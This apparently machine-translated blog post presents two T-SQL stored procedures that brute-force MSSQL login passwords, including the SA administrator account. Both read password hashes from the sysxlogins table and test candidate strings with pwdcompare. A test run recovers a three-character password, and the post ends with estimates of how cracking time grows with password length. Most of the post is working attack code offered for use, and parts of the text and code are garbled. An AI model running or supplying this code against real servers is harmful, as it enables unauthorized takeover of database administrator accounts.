The code demonstrates brute force to crack the account and password of MSSQL, including the password of the Administrator account SA.
SQL Server sa password cracking stored procedures on the Internet, the method is to brute force to crack the number and password of MSSQL, including the password of the administrator account SA, I have a little modification to the other code, and some performance analysis.
First of all, to break the core idea of the program is to store account password Master.dbo.sysxlogins table and unpublished password comparison stored procedure pwdcompare. After a side analysis, modified part of the code, the following post changes before and after the code,
A stored procedure for SQL Server sa password cracking
Copy Code code as follows:
ALTER PROC P_getpassword
@username sysname=null, user name, if not specified, list all users
@pwdlen int=2-the number of digits of the password to be cracked, by default 2-bit and below
As
Set @pwdlen =case when IsNull (@pwdlen, 0) <1 then 1 else @pwdlen-1 End
Select Top 255 id=identity (int,0,1) to #t from syscolumns
ALTER TABLE #t add constraint pk_#t primary key (ID)
Select Name,password
, type=case when xstatus&2048=2048 then 1 else 0 end
, jm=case when password are null then 1 else 0 end
, Pwdstr=cast (' as sysname ')
, Pwd=cast (' as varchar (8000))
Into #pwd
From Master.dbo.sysxlogins A
where srvid is null
and Name=isnull (@username, name)
DECLARE @s1 varchar (8000), @s2 varchar (8000), @s3 varchar (8000)
DECLARE @l int
Select @l=0
, @s1 = ' char (aa.id) '
, @s2 = ' cast (aa.id as varchar) '
, @s3 = ', #t AA '
EXEC ('
Update pwd Set jm=1,pwdstr= ' + @s1 + '
, pwd= ' + @s2 + '
From #pwd pwd ' + @s3 + '
where pwd.jm=0
and Pwdcompare (' + @s1 + ', Pwd.password,pwd.type) =1
')
While exists (select 1 from #pwd where jm=0 and @l< @pwdlen)
Begin
Select @l=@l+1
, @s1 = @s1 + ' +char (' +char (@l/26+97) +char (@l%26+97) + '. Id ') '
, @s2 = @s2 + ' + ', ' +cast (' +char (@l/26+97) +char (@l%26+97) + '. ID as varchar) '
, @s3 = @s3 + ', #t ' +char (@l/26+97) +char (@l%26+97)
EXEC ('
Update pwd Set jm=1,pwdstr= ' + @s1 + '
, pwd= ' + @s2 + '
From #pwd pwd ' + @s3 + '
where pwd.jm=0
and Pwdcompare (' + @s1 + ', Pwd.password,pwd.type) =1
')
End
Select User name =name, password =pwdstr, password ascii=pwd
From #pwd
Go
Here is my revised code:
Copy Code code as follows:
ALTER PROC P_GETPASSWORD2
@username sysname=null, user name, if not specified, list all users
@pwdlen int=2-the number of digits of the password to be cracked, by default 2-bit and below
As
SET NOCOUNT ON
If object_id (N ' tempdb). #t ') is not null
drop table #t
If object_id (N ' tempdb). #pwd ') is not null
drop table #pwd
Set @pwdlen =case when IsNull (@pwdlen, 0) <1 then 1 else @pwdlen-1 End
DECLARE @ss varchar (256)
--select @ss = ' 123456789 '
Select @ss = ' ABCDEFGHIJKLMNOPQRSTUVWXYZ '
Select @ss = @ss + ' 0123456789-=[]\;,./'
Select @ss = @ss + ' ~!@#$%^&* () _+{}|:<>?
--select @ss = @ss + ' abcdefghijklmnopqrstuvwxyz '
CREATE table #t (c char (1) NOT NULL)
ALTER TABLE #t add constraint pk_#t Primar Y key CLUSTERED (c)
declare @index int
Select @index =1
while (@index <=len (@ss))
begin
Insert #t Select SUBSTRING (@ss, @index, 1)
Select @index = @index +1
& nbsp; End
Select Name,password
, type=case when xstatus&2048=2048 then 1 else 0 end
, jm=case when password are null then 1 else 0 end
, Pwdstr=cast (' as sysname ')
, Pwd=cast (' as varchar (8000))
, Times =cast (' as varchar (8000))
Into #pwd
From Master.dbo.sysxlogins A
where srvid is null
and Name=isnull (@username, name)
DECLARE @s1 varchar (8000), @s2 varchar (8000), @s3 varchar (8000), @stimes varchar (8000)
declare @l int, @t bigint
Select @t = count (1) *power (Len (@ss), 1) from #pwd
Select @l=0
, @s1 = ' aa.c '
, @s2 = ' cast (ASCII (AA.C) as varchar) '
, @s3 = ', #t AA '
, @stimes = ' 1th, ' + cast (@t as varchar) + ' rows '
exec ('
update pwd set jm=1,pwdstr= ' + @s1 + '
, pwd= ' + @s2 + '
from #pwd PWD ' + @s3 + '
where pwd.jm=0
and Pwdcompare (' + @s1 + ', pwd.password,pwd.type) =1
')
while exists (select 1 from #pwd where jm=0 and @l< @pwdlen)
begin
&n bsp; Select @l=@l+1
Select @t = count (1) *power (Len (@ss), @l+1) from #pwd
print @t
Select
@s1 = @s1 + ' + ' + char (@l/26+97) +char (@l%26+97) + '. C '
, @s2 = @s2 + ' + ', ' +cast (ASCII (' + char (@l/26+97) +char (@l%26+97) + '. C "as varchar) '
, @s3 = @s3 + ', #t ' +char (@l/26+97) +char (@l%26+97)
, @stimes = @stimes + '; + CAST (@l+1 as varchar (1)) + ' th, ' + cast (@t as varchar) + ' rows '
EXEC ('
Update pwd Set jm=1,pwdstr= ' + @s1 + '
, pwd= ' + @s2 + '
, times= ' + @stimes + '
From #pwd pwd ' + @s3 + '
where pwd.jm=0
and Pwdcompare (' + @s1 + ', Pwd.password,pwd.type) =1
')
End
Select username =name, password =pwdstr, password ascii=pwd, number of queries and lines =times
From #pwd
If object_id (N ' tempdb). #t ') is not null
drop table #t
If object_id (N ' tempdb). #pwd ') is not null
drop table #pwd
I tested the following
Copy Code code as follows:
P_getpassword2 ' B ', 6
Username Password Password ASCII query number and number of lines
B 123 49,50,51 1th,66rows;2th,4356rows;3th,287496rows
Performance Analysis:
In this example, a query can query the maximum value of the bigint record 9223372036854775807 to do the main machine maximum performance, to rough calculation cracking performance.
Crack an account password length, crack time and performance consumption, is based on all the characters used to crack the end of the length of the password index function, that is: Crack account number * (all used to crack the number of characters) the longest password length of the second party < host maximum performance:
The original stored procedure uses 256 crack characters, theoretically can crack 7-bit password, namely 2567<max (bigint).
I modified the stored procedure using 66 keyboard regular characters, theoretically can crack 10-bit password, namely 6610<max (bigint).
If you know that the password is a combination of 10 numeric characters, you can theoretically crack a 19-bit password, that is, 1019<max (bigint).